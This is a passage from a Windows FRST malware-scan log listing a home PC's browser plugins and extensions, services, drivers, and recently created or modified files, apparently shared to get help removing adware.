FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin6.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin7.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll [2012-10-19] (Coupons, Inc.)
FF Extension: Evernote Web Clipper - C:\Users\Lexi\AppData\Roaming\Mozilla\Firefox\Profiles\s9ln76d7.default-1398562510049\Extensions\{E0B8C461-F8FB-49b4-8373-FE32E9252800}.xpi [2015-12-08]
FF Extension: Skype extension - C:\Program Files (x86)\Mozilla Firefox\extensions\{AB2CE124-6272-4b12-94A9-7303C7397BD1} [2016-01-12] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{000a9d1c-beef-4f90-9363-039d445309b8}] - C:\Program Files (x86)\Google\Google Gears\Firefox
FF Extension: Google Gears - C:\Program Files (x86)\Google\Google Gears\Firefox [2010-08-20] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [discoversoan@orbiscom] - C:\Program Files (x86)\Discover\SOAN
FF Extension: Secure Online Account Numbers - C:\Program Files (x86)\Discover\SOAN [2010-11-20] [not signed]
FF HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Firefox\Extensions: [{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382}] - C:\Users\Lexi\AppData\Local\{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382}
FF Extension: XULRunner - C:\Users\Lexi\AppData\Local\{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382} [2010-09-19] [not signed]
 
Chrome: 
=======
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\pdf.dll => No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll => No File
CHR Plugin: (CouponNetwork Coupon Activator Netscape Plugin v. 5.0.0.0) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPcol400.dll (Catalina Marketing Corporation)
CHR Plugin: (CouponNetwork Coupon Activator Netscape Plugin v. 5.0.0.0) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPcol500.dll (Catalina Marketing Corporation)
CHR Plugin: (Coupons Inc., Coupon Printer Manager ) - C:\Program Files (x86)\Mozilla Firefox\plugins\npCouponPrinter.dll => No File
CHR Plugin: (Coupons Inc., Coupon Printer Manager ) - C:\Program Files (x86)\Mozilla Firefox\plugins\npMozCouponPrinter.dll => No File
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin6.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin7.dll (Apple Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MIF5BA~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (AmazonMP3DownloaderPlugin) - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin1017300.dll (Amazon.com, Inc.)
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll => No File
CHR Plugin: (DivX Web Player) - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll => No File
CHR Plugin: (Foxit Reader Plugin for Mozilla) - C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Picasa) - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll => No File
CHR Plugin: (Java Platform SE 7 U7) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
CHR Plugin: (McAfee Security Scanner +) - C:\Program Files (x86)\McAfee Security Scan\3.0.318\npMcAfeeMss.dll => No File
CHR Plugin: (My Web Search Plugin Stub) - C:\Program Files (x86)\MyWebSearch\bar\1.bin\NPMyWebS.dll => No File
CHR Plugin: (Windows Live® Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll => No File
CHR Plugin: (Shockwave Flash) - C:\windows\SysWOW64\Macromed\Flash\NPSWF32_11_6_602_180.dll => No File
CHR Plugin: (Java Deployment Toolkit 7.0.70.11) - C:\windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll => No File
CHR Profile: C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (The Best Price (extension)) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\gehjddhojclknjlgakpfmhlhkbpeakjf [2013-07-04]
CHR Extension: (Any.do Extension) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdadialhpiikehpdeejjeiikopddkjem [2016-03-07]
CHR Extension: (Evernote Web) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\lbfehkoinhhcknnbdgnnmjhiladcgbol [2014-03-18]
CHR Extension: (Google Maps) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2015-09-28]
CHR Extension: (Springpad Extension) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\njhgeimnepehieioinbhmfpphfoocmng [2013-07-04]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-01]
CHR Extension: (My Chrome Theme) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\oehpjpccmlcalbenfhnacjeocbjdonic [2015-08-27]
CHR Extension: (Evernote Web Clipper) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\pioclpoplcdbaefihamjohnefbikjilc [2016-03-07]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 ADVService; C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientService.exe [25704 2011-11-24] (Amazon.com) [File not signed]
R2 LeapFrog Connect Device Service; C:\Program Files (x86)\LeapFrog\LeapFrog Connect\CommandService.exe [7241728 2014-07-11] (LeapFrog Enterprises, Inc.) [File not signed]
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe [126392 2009-08-24] (Symantec Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [315648 2015-09-28] (Realtek Semiconductor)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-06-12] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 hitmanpro37; C:\windows\system32\drivers\hitmanpro37.sys [43664 2015-01-28] ()
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-03-08] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-07-10] (Realtek                                            )
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-06-12] (Synaptics Incorporated)
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2012-07-05] (Duplex Secure Ltd.)
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [45728 2015-08-27] (Toshiba Corporation)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-03-08 12:22 - 2016-03-08 12:24 - 00034224 _____ C:\Users\Lexi\Downloads\FRST.txt
2016-03-08 12:22 - 2016-03-08 12:22 - 02374144 _____ (Farbar) C:\Users\Lexi\Downloads\FRST64 (1).exe
2016-03-08 12:22 - 2016-03-08 12:22 - 00000000 ____D C:\FRST
2016-03-08 12:14 - 2016-03-08 12:14 - 00016148 _____ C:\WINDOWS\system32\DURABLE_Lexi_HistoryPrediction.bin
2016-03-08 09:47 - 2016-03-08 09:47 - 02374144 _____ (Farbar) C:\Users\Lexi\Downloads\FRST64.exe
2016-03-08 09:47 - 2016-03-08 09:47 - 01524224 _____ C:\Users\Lexi\Downloads\AdwCleaner.exe
2016-03-08 09:47 - 2016-03-08 09:47 - 00000000 ____D C:\Program Files (x86)\AdwCleaner
2016-03-08 09:28 - 2016-03-08 09:28 - 00001049 _____ C:\Users\Lexi\Documents\malwaresecondtime.txt
2016-03-08 09:27 - 2016-03-08 09:27 - 00081882 _____ C:\Users\Lexi\Documents\malwarfirsttime.txt
2016-03-07 23:01 - 2016-03-08 09:36 - 00000000 ____D C:\Users\Lexi\AppData\Local\Deployment
2016-03-07 18:10 - 2016-03-08 12:14 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-03-07 18:08 - 2016-03-07 18:08 - 00001186 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-03-07 18:08 - 2016-03-07 18:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-03-07 18:08 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-03-07 18:08 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-03-07 18:08 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-03-07 18:05 - 2016-03-07 18:07 - 22908888 _____ (Malwarebytes ) C:\Users\Lexi\Downloads\mbam-setup-2.2.0.1024.exe
2016-03-06 21:09 - 2016-03-06 21:09 - 00058906 _____ C:\Users\Lexi\Desktop\sfcdetails.txt
2016-03-04 09:58 - 2016-03-07 18:08 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-03-04 09:58 - 2016-03-04 09:58 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-03 23:59 - 2016-03-07 13:16 - 00000000 ____D C:\AdwCleaner
2016-03-02 17:45 - 2016-03-02 17:45 - 00002675 _____ C:\Users\Lexi\Downloads\Your Great Value Vacations The notice on that all  documents are ready 20160003149979 _.html
2016-03-01 19:50 - 2016-03-01 19:50 - 00024404 _____ C:\Users\Lexi\Downloads\Aerobic Cellular Respiration Summary Table.pdf
2016-03-01 19:31 - 2016-03-01 19:31 - 00008986 _____ C:\Users\Lexi\Downloads\Cellular Respiration and Fermentation Study Guide (1).pdf
2016-03-01 19:30 - 2016-03-01 19:30 - 00008986 _____ C:\Users\Lexi\Downloads\Cellular Respiration and Fermentation Study Guide.pdf
2016-02-29 16:32 - 2016-02-29 16:32 - 00346580 _____ C:\Users\Lexi\Downloads\securedoc_20160219T091446.html
2016-02-29 16:10 - 2016-02-29 16:10 - 00137376 _____ C:\Users\Lexi\Downloads\March homework 2016.pdf
2016-02-25 13:02 - 2016-02-25 21:16 - 08583186 _____ C:\Users\Lexi\Documents\AVG BIO101 template6.pptx
2016-02-24 23:06 - 2016-02-24 23:06 - 01112064 _____ C:\Users\Lexi\Downloads\05_Clicker_Questions.ppt
2016-02-24 23:05 - 2016-02-24 23:06 - 00773109 _____ C:\Users\Lexi\Downloads\06_Animations.zip
2016-02-24 23:05 - 2016-02-24 23:06 - 00747369 _____ C:\Users\Lexi\Downloads\06_Videos.zip
2016-02-24 23:05 - 2016-02-24 23:05 - 01201152 _____ C:\Users\Lexi\Downloads\06_Clicker_Questions (1).ppt
2016-02-24 23:04 - 2016-02-24 23:04 - 01201152 _____ C:\Users\Lexi\Downloads\06_Clicker_Questions.ppt
2016-02-21 17:28 - 2016-02-21 17:29 - 41085818 _____ C:\Users\Lexi\Downloads\05_Videos.zip
2016-02-21 17:28 - 2016-02-21 17:29 - 127679537 _____ C:\Users\Lexi\Downloads\05_BioFlix_Animations.zip
2016-02-21 17:28 - 2016-02-21 17:28 - 02486374 _____ C:\Users\Lexi\Downloads\05_Animations.zip
2016-02-20 00:06 - 2016-02-20 00:06 - 00014174 _____ C:\Users\Lexi\Downloads\Quiz 2  How Do Cells Function- Quiz Student Analysis Report.csv
2016-02-20 00:06 - 2016-02-20 00:06 - 00014174 _____ C:\Users\Lexi\Downloads\Quiz 2  How Do Cells Function- Quiz Student Analysis Report (1).csv
2016-02-11 22:52 - 2016-02-11 22:52 - 00028661 _____ C:\Users\Lexi\Downloads\A Tour of the Cell Study Guide (1).pdf
2016-02-10 12:09 - 2016-02-10 12:09 - 08817344 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
2016-02-10 09:09 - 2016-01-31 01:25 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-10 09:09 - 2016-01-31 01:25 - 01248896 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-10 09:09 - 2016-01-31 01:24 - 01824880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-02-10 09:09 - 2016-01-31 01:23 - 02601160 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-10 09:09 - 2016-01-31 01:23 - 01420392 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 01535032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 01531368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 00809336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-10 09:09 - 2016-01-31 01:04 - 01811360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-10 09:09 - 2016-01-31 01:04 - 01180696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-02-10 09:09 - 2016-01-31 00:38 - 21873152 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-02-10 09:09 - 2016-01-31 00:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-02-10 09:09 - 2016-01-31 00:33 - 24593920 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-02-10 09:09 - 2016-01-31 00:33 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\IoTAssignedAccessLockFramework.dll
2016-02-10 09:09 - 2016-01-31 00:29 - 11557888 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-02-10 09:09 - 2016-01-31 00:29 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasman.dll
2016-02-10 09:09 - 2016-01-31 00:26 - 06787072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-02-10 09:09 - 2016-01-31 00:26 - 03793408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-10 09:09 - 2016-01-31 00:24 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-02-10 09:09 - 2016-01-31 00:24 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-02-10 09:09 - 2016-01-31 00:24 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-02-10 09:09 - 2016-01-31 00:23 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-02-10 09:09 - 2016-01-31 00:22 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-02-10 09:09 - 2016-01-31 00:20 - 02849792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 01602560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IoTAssignedAccessLockFramework.dll
2016-02-10 09:09 - 2016-01-31 00:18 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-02-10 09:09 - 2016-01-31 00:18 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-10 09:09 - 2016-01-31 00:17 - 19324928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-02-10 09:09 - 2016-01-31 00:17 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-10 09:09 - 2016-01-31 00:16 - 09889280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-02-10 09:09 - 2016-01-31 00:16 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-10 09:09 - 2016-01-31 00:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-02-10 09:09 - 2016-01-31 00:14 - 03588096 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-02-10 09:09 - 2016-01-31 00:13 - 04791808 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-02-10 09:09 - 2016-01-31 00:13 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasman.dll
2016-02-10 09:09 - 2016-01-31 00:13 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 05156352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00678400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-10 09:09 - 2016-01-31 00:07 - 18802176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-02-10 09:09 - 2016-01-31 00:06 - 02316800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-02-10 09:09 - 2016-01-31 00:05 - 01380864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-02-10 09:09 - 2016-01-31 00:05 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-02-10 09:09 - 2016-01-31 00:05 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-10 09:09 - 2016-01-31 00:04 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-10 09:09 - 2016-01-31 00:02 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-02-10 09:09 - 2016-01-31 00:02 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-10 09:09 - 2016-01-31 00:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-02-10 09:09 - 2016-01-30 23:59 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-02-10 09:09 - 2016-01-30 23:58 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-07 10:25 - 2016-02-07 10:25 - 00143306 _____ C:\Users\Lexi\Downloads\Module_1 (3).pdf
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-03-08 10:09 - 2012-04-07 21:50 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-08 09:02 - 2016-01-28 23:32 - 00004150 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{5ED844AE-3C2D-4062-87D9-F7E3150673DE}
2016-03-07 23:02 - 2010-08-20 12:24 - 00000000 ____D C:\Users\Lexi\AppData\Local\Google
2016-03-07 23:02 - 2010-05-28 20:42 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-07 22:59 - 2013-05-28 16:57 - 00000000 ____D C:\Program Files (x86)\Evernote
2016-03-07 22:57 - 2011-01-14 18:51 - 00000000 ____D C:\ProgramData\Cozi
2016-03-07 22:56 - 2010-08-13 21:56 - 00000000 ____D C:\Program Files (x86)\TOSHIBA Corporation
2016-03-07 22:56 - 2010-05-28 20:35 - 00000000 ____D C:\Program Files (x86)\TOSHIBA
2016-03-07 22:56 - 2010-05-28 20:34 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-03-07 22:56 - 2010-05-28 20:34 - 00000000 ____D C:\Program Files\TOSHIBA
2016-03-07 22:54 - 2013-05-27 22:25 - 00000000 ____D C:\Program Files (x86)\Belarc
2016-03-07 22:49 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\AppLocker
2016-03-07 22:31 - 2013-09-26 08:59 - 00000000 ____D C:\Users\Lexi\AppData\Local\Skitch
2016-03-07 22:28 - 2015-07-10 07:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-07 22:27 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\Provisioning
2016-03-07 22:27 - 2015-07-10 04:05 - 07864320 ___SH C:\WINDOWS\system32\config\BBI
2016-03-07 19:11 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\rescache
2016-03-07 18:35 - 2013-03-05 16:40 - 00002283 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-07 18:35 - 2013-03-05 16:40 - 00002271 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-03-07 14:27 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-07 14:24 - 2014-04-26 20:45 - 00000000 ____D C:\Users\Lexi\Documents\Bio101
2016-03-07 14:21 - 2015-07-10 06:04 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-07 14:07 - 2016-01-28 11:18 - 00000000 ____D C:\Users\Lexi\AppData\Local\Screencast-O-Matic-v2
2016-03-07 13:33 - 2015-08-27 20:13 - 00000000 ____D C:\Users\Lexi
2016-03-07 13:18 - 2013-06-18 14:19 - 00000000 ____D C:\Program Files (x86)\File Type Helper
2016-03-07 13:18 - 2013-02-20 00:03 - 00000000 ____D C:\WINDOWS\SysWOW64\C2MP
2016-03-07 13:17 - 2015-11-14 19:53 - 00000000 ____D C:\Users\DefaultAppPool
2016-03-07 13:16 - 2015-08-27 20:40 - 00000000 ____D C:\Users\Lexi\AppData\Local\Packages
2016-03-07 13:16 - 2015-07-10 08:14 - 00000000 ____D C:\WINDOWS\ShellNew
2016-03-07 13:16 - 2015-07-10 08:14 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-07 13:16 - 2015-07-10 06:04 - 00000000 ____D C:\Program Files\Windows Defender
2016-03-07 13:16 - 2015-07-10 06:02 - 00000000 ____D C:\WINDOWS\INF
2016-03-07 13:16 - 2015-07-10 04:05 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-03-07 13:16 - 2015-01-28 09:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Evernote
2016-03-07 13:16 - 2013-09-10 08:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
2016-03-07 13:16 - 2013-09-10 08:38 - 00000000 ____D C:\Program Files (x86)\Coupons
2016-03-07 13:16 - 2013-01-17 18:40 - 00000000 ____D C:\Program Files (x86)\BodyMedia
2016-03-07 13:16 - 2012-12-03 01:42 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-03-07 13:16 - 2012-09-15 23:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garmin
2016-03-07 13:16 - 2012-09-15 23:53 - 00000000 ____D C:\Program Files (x86)\Garmin
2016-03-07 13:16 - 2012-06-22 18:42 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\PCCUStubInstaller
2016-03-07 13:16 - 2012-06-18 22:23 - 00000000 ____D C:\Program Files (x86)\LG Electronics
2016-03-07 13:16 - 2011-08-24 08:49 - 00000000 ____D C:\Program Files (x86)\Bing Bar Installer
2016-03-07 13:16 - 2011-05-20 12:30 - 00000000 ____D C:\Users\Lexi\AppData\LocalLow\Conduit
2016-03-07 13:16 - 2010-09-19 09:15 - 00000000 ____D C:\Users\Lexi\AppData\Local\Microsoft Help
2016-03-07 13:03 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\SystemResources
2016-03-07 13:03 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\registration
2016-03-07 12:58 - 2010-08-13 21:25 - 00000000 __RHD C:\MSOCache
2016-03-04 11:31 - 2010-08-13 21:57 - 00000000 ___HD C:\WINDOWS\msdownld.tmp
2016-03-04 07:39 - 2015-08-28 00:05 - 00000000 ___DC C:\WINDOWS\Panther
2016-03-04 07:19 - 2015-10-30 04:42 - 00000000 ___HD C:\$WINDOWS.~BT
2016-03-03 23:16 - 2012-11-10 18:24 - 00000000 ____D C:\Users\Lexi\Documents\Storia
2016-02-16 22:41 - 2016-01-12 21:09 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-16 22:41 - 2012-05-30 11:51 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
